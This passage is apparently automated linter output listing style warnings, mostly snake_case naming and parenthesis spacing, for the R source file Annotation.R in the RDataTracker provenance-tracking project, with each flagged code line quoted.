caller.frame <- -1\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:154:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L154) *style:* **Variable or function name should be snake_case.**\n```r\n​    full.call <- match.call(sys.function(caller.frame), call=call)\n    ^~~~~~~~~\n```\n[R/Annotation.R:161:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L161) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.dec (\".ddg.func.depth\")\n             ^\n```\n[R/Annotation.R:166:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L166) *style:* **Variable or function name should be snake_case.**\n```r\n​    return.stmt <- .ddg.construct.DDGStatement (parse(text=orig.return), \n    ^~~~~~~~~~~\n```\n[R/Annotation.R:166:48:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L166) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return.stmt <- .ddg.construct.DDGStatement (parse(text=orig.return), \n                                               ^\n```\n[R/Annotation.R:171:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L171) *style:* **Variable or function name should be snake_case.**\n```r\n​    return.stmt <- cmd.func()\n    ^~~~~~~~~~~\n```\n[R/Annotation.R:176:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L176) *style:* **Variable or function name should be snake_case.**\n```r\n​  call.text <- gsub(\" \", \"\", deparse(call, nlines=1))\n  ^~~~~~~~~\n```\n[R/Annotation.R:177:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L177) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.node.name <- paste(call.text, \"return\")\n  ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:181:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L181) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.node.scope <-\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:182:23:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L182) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​      environmentName (if (sys.nframe() == 2) .GlobalEnv\n                      ^\n```\n[R/Annotation.R:201:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L201) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.add.to.return.values (call.text)\n                            ^\n```\n[R/Annotation.R:207:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L207) *style:* **Variable or function name should be snake_case.**\n```r\n​    vars.used <- return.stmt@vars.used\n    ^~~~~~~~~\n```\n[R/Annotation.R:224:13:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L224) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( .ddg.is.nonlocal.assign(return.stmt@parsed[[1]]) )\n            ^\n```\n[R/Annotation.R:224:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L224) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( .ddg.is.nonlocal.assign(return.stmt@parsed[[1]]) )\n                                                             ^\n```\n[R/Annotation.R:226:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L226) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          env <- .ddg.where( var, env = parent.env(parent.frame()), warning = FALSE )\n                            ^\n```\n[R/Annotation.R:226:84:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L226) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          env <- .ddg.where( var, env = parent.env(parent.frame()), warning = FALSE )\n                                                                                   ^\n```\n[R/Annotation.R:228:15:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L228) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          if ( identical(env, \"undefined\") )\n              ^\n```\n[R/Annotation.R:228:43:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L228) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          if ( identical(env, \"undefined\") )\n                                          ^\n```\n[R/Annotation.R:243:44:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L243) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.create.file.write.nodes.and.edges ()\n                                           ^\n```\n[R/Annotation.R:244:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L244) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.create.graphics.nodes.and.edges ()\n                                         ^\n```\n[R/Annotation.R:263:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L263) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.ddg.return.value.caller.frame.number <- function() {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:268:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L268) *style:* **Variable or function name should be snake_case.**\n```r\n​  ddg.funcs <- unlist(lapply (calls, \n  ^~~~~~~~~\n```\n[R/Annotation.R:268:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L268) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  ddg.funcs <- unlist(lapply (calls, \n                             ^\n```\n[R/Annotation.R:269:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L269) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) return (grepl(\"^ddg|.ddg\", deparse(call)[[1]]))))\n             ^\n```\n[R/Annotation.R:269:28:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L269) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) return (grepl(\"^ddg|.ddg\", deparse(call)[[1]]))))\n                           ^\n```\n[R/Annotation.R:270:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L270) *style:* **Variable or function name should be snake_case.**\n```r\n​  calls.to.ddg.return.value <- unlist(lapply(calls, \n  ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:271:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L271) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) \n             ^\n```\n[R/Annotation.R:273:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L273) *style:* **Variable or function name should be snake_case.**\n```r\n​  non.ddg.calls.to.ddg.return.value <- !(ddg.funcs[1:length(ddg.funcs)-1]) & \n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:275:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Variable or function name should be snake_case.**\n```r\n​  which.frame <- Position (function (call) return (call), \n  ^~~~~~~~~~~\n```\n[R/Annotation.R:275:27:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                          ^\n```\n[R/Annotation.R:275:37:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                                    ^\n```\n[R/Annotation.R:275:51:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                                                  ^\n```\n[R/Annotation.R:279:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L279) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (which.frame)\n         ^\n```\n[R/Annotation.R:286:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L286) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.inside <- function() {\n^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:303:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L303) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.details.omitted <- function() {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:304:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L304) *style:* **Variable or function name should be snake_case.**\n```r\n​  pnode.name <- \"Details Omitted\"\n  ^~~~~~~~~~\n```\n[R/Annotation.R:320:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L320) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:320:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L320) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n                                     ^\n```\n[R/Annotation.R:320:39:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L320) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n                                      ^~~~~~~~~\n```\n[R/Annotation.R:323:63:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L323) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  if (!.ddg.loop.annotate() && .ddg.inside.loop() > 0) return (FALSE)\n                                                              ^\n```\n[R/Annotation.R:334:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L334) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (.ddg.annotate.inside()) \n         ^\n```\n[R/Annotation.R:353:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L353) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.eval <- function(statement, cmd.func=NULL) {\n^~~~~~~~\n```\n[R/Annotation.R:353:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L353) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.eval <- function(statement, cmd.func=NULL) {\n                                ^~~~~~~~\n```\n[R/Annotation.R:357:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L357) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- parse(text=statement)\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:365:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L365) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- cmd@parsed\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:371:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L371) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- cmd@parsed\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:374:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L374) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  if (.ddg.debug.lib()) print (paste(\"ddg.eval: statement =\", statement))\n                              ^\n```\n[R/Annotation.R:376:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L376) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.num <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~\n```\n[R/Annotation.R:393:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L393) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.value <- .ddg.parse.commands(parsed.statement, environ=env, \n  ^~~~~~~~~~~~\n```\n[R/Annotation.R:404:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L404) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (return.value)\n         ^\n```\n[R/Annotation.R:414:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L414) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.start <- function(pname=NULL) {\n^~~~~~~~~\n```\n[R/Annotation.R:427:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L427) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.number <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~~~~\n```\n[R/Annotation.R:429:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L429) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.create.start.for.cur.cmd (env)\n                                ^\n```\n[R/Annotation.R:447:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L447) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.finish <- function(pname=NULL) {\n^~~~~~~~~~\n```\n[R/Annotation.R:455:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L455) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.insert.error.message (msg)\n                              ^\n```\n[R/Annotation.R:466:19:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L466) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return(.ddg.get (\".ddg.last.R.value\"))\n                  ^\n```\n[R/Annotation.R:474:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L474) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.annotate.on <- function (fnames=NULL){\n^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:474:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L474) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.annotate.on <- function (fnames=NULL){\n                            ^\n```\n[R/Annotation.R:482:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L482) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- .ddg.get(\"ddg.annotate.on\")\n  ^~~~~~~\n```\n[R/Annotation.R:483:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L483) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- union (on.list, fnames)\n  ^~~~~~~\n```\n[R/Annotation.R:483:20:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L483) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  on.list <- union (on.list, fnames)\n                   ^\n```\n[R/Annotation.R:487:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L487) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- .ddg.annotate.off()\n  ^~~~~~~~\n```\n[R/Annotation.R:488:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L488) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- Filter (function(off) !(off %in% fnames), off.list)\n  ^~~~~~~~\n```\n[R/Annotation.R:488:22:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L488) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  off.list <- Filter (function(off) !(off %in% fnames), off.list)\n                     ^\n```\n[R/Annotation.R:498:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L498) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.annotate.off <- function (fnames=NULL) {\n^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:498:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L498) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.annotate.off <- function (fnames=NULL) {\n                             ^\n```\n[R/Annotation.R:506:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L506) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- .ddg.annotate.off()\n  ^~~~~~~~\n```\n[R/Annotation.R:507:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L507) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- union (off.list, fnames)\n  ^~~~~~~~\n```\n[R/Annotation.R:507:21:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L507) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  off.list <- union (off.list, fnames)\n                    ^\n```\n[R/Annotation.R:511:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L511) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- .ddg.annotate.on()\n  ^~~~~~~\n```\n[R/Annotation.R:512:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L512) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- Filter (function(on) !(on %in% fnames), on.list)\n  ^~~~~~~\n```\n[R/Annotation.R:512:21:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L512) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  on.list <- Filter (function(on) !(on %in% fnames), on.list)\n                    ^\n```\n[R/Annotation.R:523:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L523) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.save.annotated.script <- function(cmds, script.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:523:46:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L523) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.save.annotated.script <- function(cmds, script.name) {\n                                             ^~~~~~~~~~~\n```\n[R/Annotation.R:542:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L542) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.annotations <- function(command) {\n^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:545:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L545) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command <- command@parsed[[1]]\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:562:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L562) *style:* **Variable or function name should be snake_case.**\n```r\n​  statement.type <- .ddg.get.statement.type(parsed.command)\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:563:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L563) *style:* **Variable or function name should be snake_case.**\n```r\n​  loop.types <- list(\"for\", \"while\", \"repeat\")\n  ^~~~~~~~~~\n```\n[R/Annotation.R:593:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L593) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.ddg.source <- function(parsed.command, cmd) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:593:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L593) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.ddg.source <- function(parsed.command, cmd) {\n                                ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:594:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L594) *style:* **Variable or function name should be snake_case.**\n```r\n​  script.name <- deparse(parsed.command[[2]])\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:595:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L595) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- paste(\"ddg.source(\", script.name, \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:614:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L614) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.function.annotations <- function(function.decl) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:614:43:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L614) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.function.annotations <- function(function.decl) {\n                                          ^~~~~~~~~~~~~\n```\n[R/Annotation.R:616:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L616) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.function.decl <- function.decl@parsed[[1]]\n  ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:619:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L619) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.name <- toString(parsed.function.decl[[2]])\n  ^~~~~~~~~\n```\n[R/Annotation.R:623:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L623) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.definition <- parsed.function.decl[[3]]\n  ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:627:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L627) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.create.function.block(func.definition)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:631:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L631) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.definition <- .ddg.add.conditional.statement(func.definition, func.name)\n  ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:635:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L635) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.insert.ddg.function(func.definition)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:640:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L640) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.all.return.parameters(func.definition, \n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:646:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L646) *style:* **Variable or function name should be snake_case.**\n```r\n​  last.statement <- .ddg.find.last.statement(func.definition)\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:651:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L651) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.last.line(func.definition, function.decl@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:658:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L658) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.with.ddg.eval(func.definition, function.decl@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:663:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n         ^\n```\n[R/Annotation.R:663:25:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n                        ^\n```\n[R/Annotation.R:663:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n                              ^\n```\n[R/Annotation.R:672:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L672) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.function.block <- function(func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:672:40:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L672) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.function.block <- function(func.definition) {\n                                       